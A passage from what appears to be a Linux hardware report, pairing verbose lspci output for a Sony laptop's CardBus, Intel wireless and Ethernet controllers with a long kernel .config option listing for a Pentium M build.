DSel=0 DScale=0 PME+ 06:03.3 Mass storage controller: Texas Instruments PCI7420/7620 Combo CardBus, 1394a-2000 OHCI and SD/MS-Pro Controller Subsystem: Sony Corporation Unknown device 8190 Control: I/O- Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 4 Region 0: Memory at b0005000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 06:04.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05) Subsystem: Intel Corporation Unknown device 2753 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (750ns min, 6000ns max), Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at b0006000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- 06:08.0 Ethernet controller: Intel Corporation 82562ET/EZ/GT/GZ - PRO/100 VE (LOM) Ethernet Controller Mobile (rev 03) Subsystem: Sony Corporation Unknown device 81d0 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 66 (2000ns min, 14000ns max), Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 7 Region 0: Memory at b0007000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at 2000 [size=64] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME- and this .config: CONFIG_X86_32=y CONFIG_GENERIC_TIME=y CONFIG_GENERIC_CMOS_UPDATE=y CONFIG_CLOCKSOURCE_WATCHDOG=y CONFIG_GENERIC_CLOCKEVENTS=y CONFIG_LOCKDEP_SUPPORT=y CONFIG_STACKTRACE_SUPPORT=y CONFIG_SEMAPHORE_SLEEPERS=y CONFIG_X86=y CONFIG_MMU=y CONFIG_ZONE_DMA=y CONFIG_QUICKLIST=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_GENERIC_BUG=y CONFIG_GENERIC_HWEIGHT=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_DMI=y CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config" CONFIG_EXPERIMENTAL=y CONFIG_BROKEN_ON_SMP=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 CONFIG_LOCALVERSION="" CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSVIPC_SYSCTL=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_BSD_PROCESS_ACCT_V3=y CONFIG_AUDIT=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_SYSCTL=y CONFIG_UID16=y CONFIG_SYSCTL_SYSCALL=y CONFIG_KALLSYMS=y CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_ELF_CORE=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_ANON_INODES=y CONFIG_EPOLL=y CONFIG_SIGNALFD=y CONFIG_EVENTFD=y CONFIG_SHMEM=y CONFIG_VM_EVENT_COUNTERS=y CONFIG_SLAB=y CONFIG_RT_MUTEXES=y CONFIG_BASE_SMALL=0 CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y CONFIG_BLOCK=y CONFIG_LBD=y CONFIG_LSF=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_CFQ=y CONFIG_DEFAULT_CFQ=y CONFIG_DEFAULT_IOSCHED="cfq" CONFIG_TICK_ONESHOT=y CONFIG_NO_HZ=y CONFIG_HIGH_RES_TIMERS=y CONFIG_X86_PC=y CONFIG_MPENTIUMM=y CONFIG_X86_CMPXCHG=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_X86_XADD=y CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_TSC=y CONFIG_X86_CMOV=y CONFIG_X86_MINIMUM_CPU_FAMILY=4 CONFIG_HPET_TIMER=y CONFIG_PREEMPT=y CONFIG_PREEMPT_BKL=y CONFIG_X86_MCE=y CONFIG_VM86=y CONFIG_MICROCODE=m CONFIG_MICROCODE_OLD_INTERFACE=y CONFIG_X86_MSR=m CONFIG_X86_CPUID=m CONFIG_EDD=m CONFIG_DELL_RBU=m CONFIG_DMIID=y CONFIG_HIGHMEM4G=y CONFIG_PAGE_OFFSET=0xC0000000 CONFIG_HIGHMEM=y CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_ARCH_SELECT_MEMORY_MODEL=y CONFIG_ARCH_POPULATES_NODE_MAP=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y CONFIG_SPARSEMEM_STATIC=y CONFIG_SPLIT_PTLOCK_CPUS=4 CONFIG_ZONE_DMA_FLAG=1 CONFIG_BOUNCE=y CONFIG_NR_QUICK=1 CONFIG_VIRT_TO_BUS=y CONFIG_MTRR=y CONFIG_SECCOMP=y CONFIG_HZ_100=y CONFIG_HZ=100 CONFIG_KEXEC=y CONFIG_PHYSICAL_START=0x100000 CONFIG_PHYSICAL_ALIGN=0x100000 CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y CONFIG_PM=y CONFIG_PM_LEGACY=y CONFIG_PM_SLEEP=y CONFIG_SUSPEND_UP_POSSIBLE=y CONFIG_SUSPEND=y CONFIG_HIBERNATION_UP_POSSIBLE=y CONFIG_ACPI=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_PROC_EVENT=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_VIDEO=m CONFIG_ACPI_FAN=y CONFIG_ACPI_DOCK=m CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y CONFIG_ACPI_BLACKLIST_YEAR=0 CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_TABLE=y CONFIG_CPU_FREQ_STAT=y CONFIG_CPU_FREQ_STAT_DETAILS=y CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE=y CONFIG_CPU_FREQ_GOV_PERFORMANCE=y CONFIG_CPU_FREQ_GOV_POWERSAVE=y CONFIG_CPU_FREQ_GOV_USERSPACE=y CONFIG_CPU_FREQ_GOV_ONDEMAND=y CONFIG_CPU_FREQ_GOV_CONSERVATIVE=y CONFIG_X86_ACPI_CPUFREQ=y CONFIG_X86_SPEEDSTEP_CENTRINO=y CONFIG_X86_SPEEDSTEP_CENTRINO_TABLE=y CONFIG_PCI=y CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y CONFIG_PCIEPORTBUS=y CONFIG_PCIEAER=y CONFIG_ISA_DMA_API=y CONFIG_PCCARD=y CONFIG_PCMCIA=y CONFIG_PCMCIA_LOAD_CIS=y CONFIG_PCMCIA_IOCTL=y CONFIG_CARDBUS=y CONFIG_YENTA=y CONFIG_YENTA_O2=y CONFIG_YENTA_RICOH=y CONFIG_YENTA_TI=y CONFIG_YENTA_ENE_TUNE=y CONFIG_YENTA_TOSHIBA=y CONFIG_I82092=y CONFIG_PCCARD_NONSTATIC=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=m CONFIG_BINFMT_MISC=m CONFIG_NET=y CONFIG_PACKET=y CONFIG_PACKET_MMAP=y CONFIG_UNIX=y CONFIG_XFRM=y CONFIG_XFRM_USER=m CONFIG_NET_KEY=m CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_ADVANCED_ROUTER=y CONFIG_ASK_IP_FIB_HASH=y CONFIG_IP_FIB_HASH=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ROUTE_MULTIPATH=y CONFIG_IP_ROUTE_VERBOSE=y CONFIG_NET_IPIP=m CONFIG_NET_IPGRE=m CONFIG_NET_IPGRE_BROADCAST=y CONFIG_IP_MROUTE=y CONFIG_IP_PIMSM_V1=y CONFIG_IP_PIMSM_V2=y CONFIG_SYN_COOKIES=y CONFIG_INET_AH=m CONFIG_INET_ESP=m CONFIG_INET_IPCOMP=m CONFIG_INET_XFRM_TUNNEL=m CONFIG_INET_TUNNEL=m CONFIG_INET_XFRM_MODE_TRANSPORT=m CONFIG_INET_XFRM_MODE_TUNNEL=m CONFIG_INET_XFRM_MODE_BEET=y CONFIG_INET_DIAG=m CONFIG_INET_TCP_DIAG=m CONFIG_TCP_CONG_ADVANCED=y CONFIG_TCP_CONG_BIC=y CONFIG_DEFAULT_BIC=y CONFIG_DEFAULT_TCP_CONG="bic" CONFIG_NETWORK_SECMARK=y CONFIG_NETFILTER=y CONFIG_BRIDGE_NETFILTER=y CONFIG_NETFILTER_NETLINK=m CONFIG_NETFILTER_NETLINK_QUEUE=m CONFIG_NETFILTER_NETLINK_LOG=m CONFIG_NETFILTER_XTABLES=m CONFIG_NETFILTER_XT_TARGET_CLASSIFY=m CONFIG_NETFILTER_XT_TARGET_MARK=m CONFIG_NETFILTER_XT_TARGET_NFQUEUE=m CONFIG_NETFILTER_XT_TARGET_SECMARK=m CONFIG_NETFILTER_XT_MATCH_COMMENT=m CONFIG_NETFILTER_XT_MATCH_DCCP=m CONFIG_NETFILTER_XT_MATCH_ESP=m CONFIG_NETFILTER_XT_MATCH_LENGTH=m CONFIG_NETFILTER_XT_MATCH_LIMIT=m CONFIG_NETFILTER_XT_MATCH_MAC=m CONFIG_NETFILTER_XT_MATCH_MARK=m CONFIG_NETFILTER_XT_MATCH_POLICY=m CONFIG_NETFILTER_XT_MATCH_MULTIPORT=m CONFIG_NETFILTER_XT_MATCH_PHYSDEV=m CONFIG_NETFILTER_XT_MATCH_PKTTYPE=m CONFIG_NETFILTER_XT_MATCH_QUOTA=m CONFIG_NETFILTER_XT_MATCH_REALM=m CONFIG_NETFILTER_XT_MATCH_SCTP=m CONFIG_NETFILTER_XT_MATCH_STATISTIC=m CONFIG_NETFILTER_XT_MATCH_STRING=m CONFIG_NETFILTER_XT_MATCH_TCPMSS=m CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_IPRANGE=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_AH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_MATCH_ADDRTYPE=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_TTL=m CONFIG_IP_NF_RAW=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IP_NF_ARP_MANGLE=m CONFIG_DECNET_NF_GRABULATOR=m CONFIG_BRIDGE_NF_EBTABLES=m CONFIG_BRIDGE_EBT_BROUTE=m CONFIG_BRIDGE_EBT_T_FILTER=m CONFIG_BRIDGE_EBT_T_NAT=m CONFIG_BRIDGE_EBT_802_3=m CONFIG_BRIDGE_EBT_AMONG=m CONFIG_BRIDGE_EBT_ARP=m CONFIG_BRIDGE_EBT_IP=m CONFIG_BRIDGE_EBT_LIMIT=m CONFIG_BRIDGE_EBT_MARK=m CONFIG_BRIDGE_EBT_PKTTYPE=m CONFIG_BRIDGE_EBT_STP=m CONFIG_BRIDGE_EBT_VLAN=m CONFIG_BRIDGE_EBT_ARPREPLY=m CONFIG_BRIDGE_EBT_DNAT=m CONFIG_BRIDGE_EBT_MARK_T=m CONFIG_BRIDGE_EBT_REDIRECT=m CONFIG_BRIDGE_EBT_SNAT=m CONFIG_BRIDGE_EBT_LOG=m CONFIG_BRIDGE_EBT_ULOG=m CONFIG_BRIDGE=m CONFIG_VLAN_8021Q=m CONFIG_DECNET=m CONFIG_LLC=m CONFIG_LLC2=m CONFIG_IPX=m CONFIG_ATALK=m CONFIG_DEV_APPLETALK=m CONFIG_IPDDP=m CONFIG_IPDDP_ENCAP=y CONFIG_IPDDP_DECAP=y CONFIG_WAN_ROUTER=m CONFIG_NET_SCHED=y CONFIG_NET_SCH_FIFO=y CONFIG_NET_SCH_CBQ=m CONFIG_NET_SCH_HTB=m CONFIG_NET_SCH_HFSC=m CONFIG_NET_SCH_PRIO=m CONFIG_NET_SCH_RED=m CONFIG_NET_SCH_SFQ=m CONFIG_NET_SCH_TEQL=m CONFIG_NET_SCH_TBF=m CONFIG_NET_SCH_GRED=m CONFIG_NET_SCH_DSMARK=m CONFIG_NET_SCH_NETEM=m CONFIG_NET_SCH_INGRESS=m CONFIG_NET_CLS=y CONFIG_NET_CLS_BASIC=m CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m CONFIG_CLS_U32_PERF=y CONFIG_CLS_U32_MARK=y CONFIG_NET_CLS_RSVP=m CONFIG_NET_EMATCH=y CONFIG_NET_EMATCH_STACK=32 CONFIG_NET_EMATCH_CMP=m CONFIG_NET_EMATCH_NBYTE=m CONFIG_NET_EMATCH_U32=m CONFIG_NET_EMATCH_META=m CONFIG_NET_EMATCH_TEXT=m CONFIG_NET_CLS_ACT=y CONFIG_NET_ACT_POLICE=m CONFIG_NET_ACT_GACT=m CONFIG_GACT_PROB=y CONFIG_NET_ACT_MIRRED=m CONFIG_NET_ACT_IPT=m CONFIG_NET_ACT_PEDIT=m CONFIG_NET_ACT_SIMP=m CONFIG_NET_CLS_IND=y CONFIG_NET_PKTGEN=m CONFIG_IRDA=m CONFIG_IRLAN=m CONFIG_IRCOMM=m CONFIG_IRDA_ULTRA=y CONFIG_IRDA_CACHE_LAST_LSAP=y CONFIG_IRDA_FAST_RR=y CONFIG_IRDA_DEBUG=y CONFIG_IRTTY_SIR=m CONFIG_KINGSUN_DONGLE=m CONFIG_USB_IRDA=m CONFIG_SIGMATEL_FIR=m CONFIG_MCS_FIR=m CONFIG_BT=m CONFIG_BT_L2CAP=m CONFIG_BT_SCO=m CONFIG_BT_RFCOMM=m CONFIG_BT_RFCOMM_TTY=y CONFIG_BT_BNEP=m CONFIG_BT_BNEP_MC_FILTER=y CONFIG_BT_BNEP_PROTO_FILTER=y CONFIG_BT_HIDP=m CONFIG_BT_HCIUSB=m CONFIG_BT_HCIUSB_SCO=y CONFIG_BT_HCIUART=m CONFIG_BT_HCIUART_H4=y CONFIG_BT_HCIUART_BCSP=y CONFIG_BT_HCIBCM203X=m CONFIG_BT_HCIBPA10X=m CONFIG_BT_HCIBFUSB=m CONFIG_BT_HCIDTL1=m CONFIG_BT_HCIBT3C=m CONFIG_BT_HCIBLUECARD=m CONFIG_BT_HCIBTUART=m CONFIG_BT_HCIVHCI=m CONFIG_AF_RXRPC=m CONFIG_FIB_RULES=y CONFIG_CFG80211=y CONFIG_WIRELESS_EXT=y CONFIG_IEEE80211=y CONFIG_IEEE80211_CRYPT_WEP=y CONFIG_IEEE80211_CRYPT_CCMP=y CONFIG_IEEE80211_CRYPT_TKIP=y CONFIG_IEEE80211_SOFTMAC=y CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=y CONFIG_CONNECTOR=m CONFIG_MTD=y CONFIG_MTD_CONCAT=m CONFIG_MTD_PARTITIONS=y CONFIG_MTD_REDBOOT_PARTS=m CONFIG_MTD_REDBOOT_DIRECTORY_BLOCK=-1 CONFIG_MTD_CHAR=m CONFIG_MTD_BLKDEVS=m CONFIG_MTD_BLOCK=m CONFIG_MTD_BLOCK_RO=m CONFIG_FTL=m CONFIG_NFTL=m CONFIG_NFTL_RW=y CONFIG_INFTL=m CONFIG_RFD_FTL=m CONFIG_MTD_CFI=m CONFIG_MTD_JEDECPROBE=m CONFIG_MTD_GEN_PROBE=m CONFIG_MTD_MAP_BANK_WIDTH_1=y CONFIG_MTD_MAP_BANK_WIDTH_2=y CONFIG_MTD_MAP_BANK_WIDTH_4=y CONFIG_MTD_CFI_I1=y CONFIG_MTD_CFI_I2=y CONFIG_MTD_CFI_INTELEXT=m CONFIG_MTD_CFI_AMDSTD=m CONFIG_MTD_CFI_STAA=m CONFIG_MTD_CFI_UTIL=m CONFIG_MTD_RAM=m CONFIG_MTD_ROM=m CONFIG_MTD_ABSENT=m CONFIG_MTD_COMPLEX_MAPPINGS=y CONFIG_MTD_PHYSMAP=m CONFIG_MTD_PHYSMAP_START=0x8000000 CONFIG_MTD_PHYSMAP_LEN=0x4000000 CONFIG_MTD_PHYSMAP_BANKWIDTH=2 CONFIG_MTD_PNC2000=m CONFIG_MTD_SC520CDP=m CONFIG_MTD_NETSC520=m CONFIG_MTD_TS5500=m CONFIG_MTD_SBC_GXX=m CONFIG_MTD_NETtel=m CONFIG_MTD_DILNETPC=m CONFIG_MTD_DILNETPC_BOOTSIZE=0x80000 CONFIG_MTD_PCI=m CONFIG_MTD_PLATRAM=m CONFIG_MTD_PMC551=m CONFIG_MTD_DATAFLASH=m CONFIG_MTD_M25P80=m CONFIG_MTD_SLRAM=m CONFIG_MTD_PHRAM=m CONFIG_MTD_MTDRAM=m CONFIG_MTDRAM_TOTAL_SIZE=4096 CONFIG_MTDRAM_ERASE_SIZE=128 CONFIG_MTD_BLOCK2MTD=m CONFIG_MTD_DOC2000=m CONFIG_MTD_DOC2001=m CONFIG_MTD_DOC2001PLUS=m CONFIG_MTD_DOCPROBE=m CONFIG_MTD_DOCECC=m CONFIG_MTD_DOCPROBE_ADDRESS=0 CONFIG_MTD_NAND=m CONFIG_MTD_NAND_IDS=m CONFIG_MTD_NAND_DISKONCHIP=m CONFIG_MTD_NAND_DISKONCHIP_PROBE_ADDRESS=0 CONFIG_MTD_NAND_CS553X=m CONFIG_MTD_ONENAND=m CONFIG_MTD_ONENAND_VERIFY_WRITE=y CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_SERIAL=m CONFIG_PARPORT_PC_FIFO=y CONFIG_PARPORT_PC_PCMCIA=m CONFIG_PARPORT_AX88796=m CONFIG_PARPORT_1284=y CONFIG_PARPORT_NOT_PC=y CONFIG_PNP=y CONFIG_PNPACPI=y CONFIG_BLK_DEV=y CONFIG_PARIDE=m CONFIG_PARIDE_PD=m CONFIG_PARIDE_PCD=m CONFIG_PARIDE_PF=m CONFIG_PARIDE_PT=m CONFIG_PARIDE_PG=m CONFIG_PARIDE_ATEN=m CONFIG_PARIDE_BPCK=m CONFIG_PARIDE_BPCK6=m CONFIG_PARIDE_COMM=m CONFIG_PARIDE_DSTR=m CONFIG_PARIDE_FIT2=m CONFIG_PARIDE_FIT3=m CONFIG_PARIDE_EPAT=m CONFIG_PARIDE_EPIA=m CONFIG_PARIDE_FRIQ=m CONFIG_PARIDE_FRPW=m CONFIG_PARIDE_KBIC=m CONFIG_PARIDE_KTTI=m CONFIG_PARIDE_ON20=m CONFIG_PARIDE_ON26=m CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_CDROM_PKTCDVD=m CONFIG_CDROM_PKTCDVD_BUFFERS=8 CONFIG_ATA_OVER_ETH=m CONFIG_MISC_DEVICES=y CONFIG_TIFM_CORE=m CONFIG_TIFM_7XX1=m CONFIG_SONY_LAPTOP=y CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y CONFIG_BLK_DEV_IDEDISK=y CONFIG_BLK_DEV_IDECS=m CONFIG_BLK_DEV_IDECD=y CONFIG_IDE_PROC_FS=y CONFIG_IDE_GENERIC=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_IDEPCI_PCIBUS_ORDER=y CONFIG_BLK_DEV_IDEDMA_PCI=y CONFIG_BLK_DEV_IDEDMA=y CONFIG_RAID_ATTRS=m CONFIG_SCSI=y CONFIG_SCSI_DMA=y CONFIG_SCSI_NETLINK=y CONFIG_SCSI_PROC_FS=y CONFIG_BLK_DEV_SD=m CONFIG_CHR_DEV_ST=m CONFIG_CHR_DEV_OSST=m CONFIG_BLK_DEV_SR=m CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=m CONFIG_CHR_DEV_SCH=m CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_CONSTANTS=y CONFIG_SCSI_LOGGING=y CONFIG_SCSI_WAIT_SCAN=m CONFIG_SCSI_SPI_ATTRS=m CONFIG_SCSI_FC_ATTRS=m CONFIG_SCSI_ISCSI_ATTRS=m CONFIG_SCSI_LOWLEVEL=y CONFIG_ISCSI_TCP=m CONFIG_SCSI_EATA=m CONFIG_SCSI_EATA_TAGGED_QUEUE=y CONFIG_SCSI_EATA_LINKED_COMMANDS=y CONFIG_SCSI_EATA_MAX_TAGS=16 CONFIG_ATA=y CONFIG_ATA_ACPI=y CONFIG_ATA_PIIX=y CONFIG_PATA_PCMCIA=m CONFIG_IEEE1394=y CONFIG_IEEE1394_OHCI1394=y CONFIG_IEEE1394_VIDEO1394=m CONFIG_IEEE1394_SBP2=y CONFIG_IEEE1394_ETH1394_ROM_ENTRY=y CONFIG_IEEE1394_ETH1394=m CONFIG_IEEE1394_RAWIO=m CONFIG_NETDEVICES=y CONFIG_IFB=m CONFIG_DUMMY=m CONFIG_BONDING=m CONFIG_EQUALIZER=m CONFIG_TUN=m CONFIG_NET_ETHERNET=y CONFIG_MII=y CONFIG_NET_TULIP=y CONFIG_DE2104X=m CONFIG_TULIP=m CONFIG_TULIP_NAPI=y CONFIG_TULIP_NAPI_HW_MITIGATION=y CONFIG_DE4X5=m CONFIG_WINBOND_840=m CONFIG_DM9102=m CONFIG_ULI526X=m CONFIG_PCMCIA_XIRCOM=m CONFIG_NET_PCI=y CONFIG_E100=y CONFIG_WLAN_80211=y CONFIG_IPW2200=m CONFIG_IPW2200_MONITOR=y CONFIG_IPW2200_RADIOTAP=y CONFIG_IPW2200_PROMISCUOUS=y CONFIG_IPW2200_QOS=y CONFIG_USB_CATC=m CONFIG_USB_KAWETH=m CONFIG_USB_PEGASUS=m CONFIG_USB_RTL8150=m CONFIG_USB_USBNET_MII=m CONFIG_USB_USBNET=m CONFIG_USB_NET_AX8817X=m CONFIG_USB_NET_CDCETHER=m CONFIG_USB_NET_GL620A=m CONFIG_USB_NET_NET1080=m CONFIG_USB_NET_PLUSB=m CONFIG_USB_NET_RNDIS_HOST=m CONFIG_USB_NET_CDC_SUBSET=m CONFIG_USB_ALI_M5632=y CONFIG_USB_AN2720=y CONFIG_USB_BELKIN=y CONFIG_USB_ARMLINUX=y CONFIG_USB_EPSON2888=y CONFIG_USB_NET_ZAURUS=m CONFIG_NET_PCMCIA=y CONFIG_PCMCIA_3C589=m CONFIG_PCMCIA_3C574=m CONFIG_PCMCIA_FMVJ18X=m CONFIG_PCMCIA_PCNET=m CONFIG_PCMCIA_NMCLAN=m CONFIG_PCMCIA_SMC91C92=m CONFIG_PCMCIA_XIRC2PS=m CONFIG_PCMCIA_AXNET=m CONFIG_PLIP=m CONFIG_SLIP=m CONFIG_SLIP_COMPRESSED=y CONFIG_SLHC=m CONFIG_SLIP_SMART=y CONFIG_SLIP_MODE_SLIP6=y CONFIG_INPUT=y CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1280 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=800 CONFIG_INPUT_JOYDEV=y CONFIG_INPUT_EVDEV=y CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_MOUSE_PS2_ALPS=y CONFIG_MOUSE_PS2_LOGIPS2PP=y CONFIG_MOUSE_PS2_SYNAPTICS=y CONFIG_MOUSE_PS2_LIFEBOOK=y CONFIG_MOUSE_PS2_TRACKPOINT=y CONFIG_MOUSE_SERIAL=m CONFIG_MOUSE_VSXXXAA=m CONFIG_INPUT_JOYSTICK=y CONFIG_JOYSTICK_ANALOG=m CONFIG_JOYSTICK_A3D=m CONFIG_JOYSTICK_ADI=m CONFIG_JOYSTICK_COBRA=m CONFIG_JOYSTICK_GF2K=m CONFIG_JOYSTICK_GRIP=m CONFIG_JOYSTICK_GRIP_MP=m CONFIG_JOYSTICK_GUILLEMOT=m CONFIG_JOYSTICK_INTERACT=m CONFIG_JOYSTICK_SIDEWINDER=m CONFIG_JOYSTICK_TMDC=m CONFIG_JOYSTICK_IFORCE=m CONFIG_JOYSTICK_IFORCE_USB=y CONFIG_JOYSTICK_IFORCE_232=y CONFIG_JOYSTICK_WARRIOR=m CONFIG_JOYSTICK_MAGELLAN=m CONFIG_JOYSTICK_SPACEORB=m CONFIG_JOYSTICK_SPACEBALL=m CONFIG_JOYSTICK_STINGER=m CONFIG_JOYSTICK_TWIDJOY=m CONFIG_JOYSTICK_DB9=m CONFIG_JOYSTICK_GAMECON=m CONFIG_JOYSTICK_TURBOGRAFX=m CONFIG_JOYSTICK_JOYDUMP=m CONFIG_INPUT_MISC=y CONFIG_INPUT_ATI_REMOTE=m CONFIG_INPUT_ATI_REMOTE2=m CONFIG_INPUT_KEYSPAN_REMOTE=m CONFIG_INPUT_POWERMATE=m CONFIG_INPUT_YEALINK=m CONFIG_INPUT_UINPUT=m CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=m CONFIG_SERIO_CT82C710=m CONFIG_SERIO_PARKBD=m CONFIG_SERIO_PCIPS2=m CONFIG_SERIO_LIBPS2=y CONFIG_SERIO_RAW=m CONFIG_GAMEPORT=m CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y CONFIG_FIX_EARLYCON_MEM=y CONFIG_SERIAL_8250_PCI=y CONFIG_SERIAL_8250_PNP=y CONFIG_SERIAL_8250_CS=m CONFIG_SERIAL_8250_NR_UARTS=16 CONFIG_SERIAL_8250_RUNTIME_UARTS=4 CONFIG_SERIAL_8250_EXTENDED=y CONFIG_SERIAL_8250_MANY_PORTS=y CONFIG_SERIAL_8250_SHARE_IRQ=y CONFIG_SERIAL_8250_RSA=y CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=16 CONFIG_PPDEV=m CONFIG_TIPAR=m CONFIG_WATCHDOG=y CONFIG_SOFT_WATCHDOG=m CONFIG_NVRAM=m CONFIG_RTC=m CONFIG_GEN_RTC=m CONFIG_GEN_RTC_X=y CONFIG_AGP=y CONFIG_DRM=y CONFIG_HPET=y CONFIG_HPET_MMAP=y CONFIG_DEVPORT=y CONFIG_SPI=y CONFIG_SPI_MASTER=y CONFIG_SPI_BITBANG=m CONFIG_SPI_BUTTERFLY=m CONFIG_VIDEO_DEV=m CONFIG_VIDEO_V4L1=y CONFIG_VIDEO_V4L1_COMPAT=y CONFIG_VIDEO_V4L2=y CONFIG_VIDEO_CAPTURE_DRIVERS=y CONFIG_VIDEO_HELPER_CHIPS_AUTO=y CONFIG_V4L_USB_DRIVERS=y CONFIG_VIDEO_USBVIDEO=m CONFIG_USB_VICAM=m CONFIG_USB_IBMCAM=m CONFIG_USB_KONICAWC=m CONFIG_USB_QUICKCAM_MESSENGER=m CONFIG_USB_ET61X251=m CONFIG_USB_OV511=m CONFIG_USB_SE401=m CONFIG_USB_SN9C102=m CONFIG_USB_STV680=m CONFIG_USB_ZC0301=m CONFIG_USB_PWC=m CONFIG_USB_ZR364XX=m CONFIG_RADIO_ADAPTERS=y 